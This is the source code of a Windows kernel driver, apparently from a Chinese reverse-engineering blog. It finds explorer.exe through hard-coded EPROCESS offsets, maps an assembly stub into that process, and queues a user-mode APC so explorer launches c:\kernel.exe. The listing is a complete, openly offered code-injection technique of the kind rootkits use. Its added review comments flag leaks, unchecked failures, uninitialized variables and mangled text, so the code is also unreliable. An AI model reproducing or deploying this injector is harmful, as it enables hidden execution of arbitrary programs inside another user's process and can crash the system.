逆向工程之内核下创建用户进程
//By:Eros412
#include <ntddk.h>
#include <ntifs.h>
// Driver-wide state shared between DriverEntry, myroutine and OnUnload.
PKAPC_STATE ApcState; // allocated in DriverEntry for KeStackAttachProcess; never freed anywhere on this page
ULONG peprocess;      // cursor for the process-list walk in DriverEntry; starts at IoGetCurrentProcess()
ULONG explorer;       // EPROCESS whose image name matched "explorer.exe"; stays 0 if no match was found
PMDL mdl;             // MDL over call_me's code; released in myroutine (the APC KernelRoutine)
// APC environment selector for KeInitializeApc. Declared locally because the
// DDK headers included above do not expose the APC internals this driver calls.
typedef enum _KAPC_ENVIRONMENT {
OriginalApcEnvironment, // 0 — the value DriverEntry passes literally
AttachedApcEnvironment,
CurrentApcEnvironment,
InsertApcEnvironment
} KAPC_ENVIRONMENT;
// Prototypes for kernel exports the included headers do not declare.
// KeInitializeApc/KeInsertQueueApc are not part of the documented DDK API;
// the signatures below are the ones this file relies on — confirm they match
// the target build. ExFreePoolWithTag is documented and is presumably
// redeclared here for an older DDK.
NTKERNELAPI
VOID
KeInitializeApc (
PKAPC Apc,
PETHREAD Thread,
KAPC_ENVIRONMENT Environment,
PKKERNEL_ROUTINE KernelRoutine,   // runs in kernel mode at delivery, before NormalRoutine
PKRUNDOWN_ROUTINE RundownRoutine, // runs if the thread exits before delivery (DriverEntry passes none)
PKNORMAL_ROUTINE NormalRoutine,   // runs in ProcessorMode (user mode here) with NormalContext
KPROCESSOR_MODE ProcessorMode,
PVOID NormalContext
);
NTKERNELAPI
BOOLEAN
KeInsertQueueApc (
PKAPC Apc,
PVOID SystemArgument1,
PVOID SystemArgument2,
KPRIORITY Increment
);
NTKERNELAPI
VOID
ExFreePoolWithTag(
IN PVOID P,
IN ULONG Tag
);
// Code stub that DriverEntry maps into the target process and registers as the
// user-mode NormalRoutine of a queued APC. It is naked (no prologue/epilogue),
// so the bytes below are exactly what gets mapped. It depends on two
// build-specific facts: the absolute address loaded into eax, and the byte
// offset 9 of the push operand that DriverEntry patches (see jmpaddr_9).
__declspec(naked) void call_me()
{
_asm{
mov eax,0x7C86136D   // absolute user-mode address hard-coded for one OS build; on any other build this points at arbitrary code (stability hazard)
push 1               // second argument of the call
nop
push 0ABCDh          // placeholder imm32; DriverEntry overwrites it (through the user-mode mapping) with the address of the string below
call eax             // presumably a two-argument stdcall API taking (path, flag) — confirm against the target build
jmp here
_emit 0x63 // embedded NUL-terminated string; the bytes decode to "c:\kernel.exe" (original comment: path c:/kernel.exe)
_emit 0x3A
_emit 0x5C
_emit 0x6B
_emit 0x65
_emit 0x72
_emit 0x6E
_emit 0x65
_emit 0x6C
_emit 0x2E
_emit 0x65
_emit 0x78
_emit 0x65
_emit 0x00
_emit 0x00
here:
nop
retn 0x0C            // KNORMAL_ROUTINE is stdcall with three PVOID args (NormalContext, SystemArgument1, SystemArgument2): pop 12 bytes
}
}
// Unload callback: removes the device object created in DriverEntry.
// NOTE(review): nothing here cancels a still-pending APC or frees ApcState.
// If the APC is delivered after the driver is unloaded, its KernelRoutine
// (myroutine) points into memory that is no longer the driver image.
VOID OnUnload(
IN PDRIVER_OBJECT pDriverObject
)
{
if(pDriverObject->DeviceObject!=NULL)
IoDeleteDevice(pDriverObject->DeviceObject);
}
// KernelRoutine of the queued APC. Runs in the target thread when the APC is
// delivered, before the user-mode NormalRoutine (call_me). Releases the APC
// object and the MDL that backs the user-mode mapping.
// NOTE(review): the user-mode mapping created by MmMapLockedPagesSpecifyCache
// is never unmapped (no MmUnmapLockedPages call on this page), and the pages
// are unlocked here before the user-mode routine that lives in them has run —
// confirm this ordering is safe on the target build.
VOID myroutine(
IN PKAPC Apc,
IN OUT PKNORMAL_ROUTINE *NormalRoutine,
IN OUT PVOID *NormalContext,
IN OUT PVOID *SystemArgument1,
IN OUT PVOID *SystemArgument2
)
{
ExFreePoolWithTag(Apc,0); // Apc was allocated with tag 0x206B6444 in DriverEntry; freed with tag 0 as ExFreePool would pass
MmUnlockPages(mdl);
IoFreeMdl(mdl);           // mdl is a global and is not reset to NULL afterwards
}
// Driver entry point. Walks the process list starting at the current process
// looking for "explorer.exe", picks an alertable thread in it, maps call_me
// into that process's user-mode address space, patches the mapped stub with
// the user-mode address of its embedded string, and queues a user-mode APC on
// the thread so the stub runs there. Returns STATUS_SUCCESS on every path,
// including the failure paths below, so the driver stays loaded regardless.
// All EPROCESS/ETHREAD offsets used here (0x088, 0x174, 0x1a0, 0x190, 0x22C,
// 0x164) and the user-mode address inside call_me are hard-coded for one OS
// build the page does not name; on any other build they read or write the
// wrong kernel memory.
// From a defender's view the notable observables are a driver attaching to a
// foreign process (KeStackAttachProcess), mapping locked kernel pages into
// user mode, and queuing a user-mode APC on a thread it does not own.
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING pRegistryPath
)
{
unsigned char alertable;
int activethread;
ULONG kthread; // NOTE(review): only assigned inside the thread loop below; read afterwards even when no match was found
PLIST_ENTRY cur;
PLIST_ENTRY next;
PLIST_ENTRY tcur;
PLIST_ENTRY tnext;
unsigned char * imagename;
UNICODE_STRING us;
PDEVICE_OBJECT _device;
PRKAPC apc;
PVOID mappedmemory;
ULONG jmpaddr_9;
ULONG jmpaddr_14;
// NOTE(review): "//Device//KernelExec" here and "%s/t%d" below look like
// backslashes mangled by the blog's formatting (the NT object namespace uses
// '\'); treat this listing as not byte-exact.
RtlInitUnicodeString(&us,L"//Device//KernelExec");
IoCreateDevice(pDriverObject,0,&us,FILE_DEVICE_UNKNOWN,0x100,0,&_device); // return status not checked; _device may be left unset
pDriverObject->DriverUnload=OnUnload;
peprocess=(ULONG)IoGetCurrentProcess();
cur=next=(PLIST_ENTRY)((ULONG)peprocess+0x088); // process-list link at a hard-coded EPROCESS offset
do{
imagename=(unsigned char*)ExAllocatePool(NonPagedPool,255); // NOTE(review): result is overwritten on the next line; 255 bytes of NonPagedPool leak per iteration
imagename=(unsigned char*)((ULONG)peprocess+0x174);         // image-name field at a hard-coded EPROCESS offset
activethread=*(ULONG*)((ULONG)peprocess+0x1a0);             // active-thread count at a hard-coded offset (only used for the debug print)
if(!_strnicmp(imagename,"explorer.exe",12)){
DbgPrint("%s/t%d threads",imagename,activethread);
explorer=peprocess;
tcur=tnext=(PLIST_ENTRY)((ULONG)peprocess+0x190); // thread-list head at a hard-coded EPROCESS offset
do{
kthread=(ULONG)tnext-0x22C;                       // ETHREAD from its list entry, hard-coded offset
alertable=*(unsigned char*)(kthread+0x164);       // alertable flag at a hard-coded ETHREAD offset
if((int)alertable==TRUE){ // matches only the exact value 1
DbgPrint("KernelExec -> Found alertable thread");
break;
}
tnext=tnext->Flink;
}while(tnext!=tcur); // NOTE(review): if no thread is alertable, kthread is left as the last thread walked and is used anyway
break;
}
next=next->Flink;
peprocess=(ULONG)next-0x088;
}while(next!=cur);
DbgPrint("KernelExec -> Targeted thread: 0x%p",kthread); // NOTE(review): uninitialized if explorer.exe was not found; explorer is then 0 and the attach below would fault
apc=ExAllocatePoolWithTag(NonPagedPool,0x30,0x206B6444); // 0x30 presumably sizeof(KAPC) on the target build — confirm
if(apc==NULL)
DbgPrint("KernelExec -> Failed to allocate memory"); // NOTE(review): only logged; execution continues with apc == NULL
mdl=IoAllocateMdl(call_me,100,0,0,0); // MDL over the first 100 bytes of call_me (driver code); no secondary buffer, no quota, no IRP
if(mdl==0){
DbgPrint("KernelExec -> Failed to allocate MDL");
ExFreePoolWithTag(apc,0);
goto end1;
}
MmProbeAndLockPages(mdl,0,1); // access mode 0 (KernelMode), operation 1 (presumably IoWriteAccess); this call raises on failure and there is no __try here
ApcState=ExAllocatePool(NonPagedPool,sizeof(KAPC_STATE)); // not NULL-checked; never freed on this page
KeStackAttachProcess((PKPROCESS)explorer,ApcState); // switch to explorer's address space so the mapping below is user-mode in that process
mappedmemory=MmMapLockedPagesSpecifyCache(mdl,1,1,0,0,0x10); // AccessMode 1 (UserMode), cache type 1, no base hint, no bugcheck on failure, priority 0x10 — presumably MmCached/NormalPagePriority; confirm
if(mappedmemory==NULL){
DbgPrint("KernelExec -> Cannot map address");
KeUnstackDetachProcess(ApcState);
IoFreeMdl(mdl); // NOTE(review): pages locked above are not unlocked (no MmUnlockPages) on this path
ExFreePoolWithTag(apc,0);
goto end1;
}
DbgPrint("KernelExec -> UserMode memory at address:0x%p",mappedmemory);
jmpaddr_9 = (ULONG)mappedmemory+0x9; // imm32 operand of "push 0ABCDh" in call_me: mov eax,imm32 (5 bytes) + push 1 (2) + nop (1) + push opcode (1)
jmpaddr_14 = (ULONG)mappedmemory+0x14-3; // user-mode address of the embedded string; original comment: the relative jmp is 2 bytes, hence minus 3
// Write the string's user-mode address into the stub through the user-mode
// mapping, while still attached to the target process. Flags/registers are
// saved around the write.
_asm{
pushad
pushfd
mov ecx,jmpaddr_9
mov edx,jmpaddr_14
mov [ecx],edx
popfd
popad
}
KeUnstackDetachProcess (ApcState);
// Environment 0 = OriginalApcEnvironment, KernelRoutine = myroutine, no
// RundownRoutine (if the thread exits before delivery the APC, MDL and pool
// are never released), NormalRoutine = the mapped stub, ProcessorMode 1 = UserMode.
KeInitializeApc(apc,(PETHREAD)kthread,0,myroutine,0,mappedmemory,1,0);
if(!KeInsertQueueApc(apc,0,0,0))
DbgPrint("KernelExec -> Failed to insert APC"); // NOTE(review): failure is only logged; apc is not freed and the next line still reports delivery
DbgPrint("KernelExec -> APC delivered");
end1:
return STATUS_SUCCESS; // success is returned on every path, including the failure paths above
}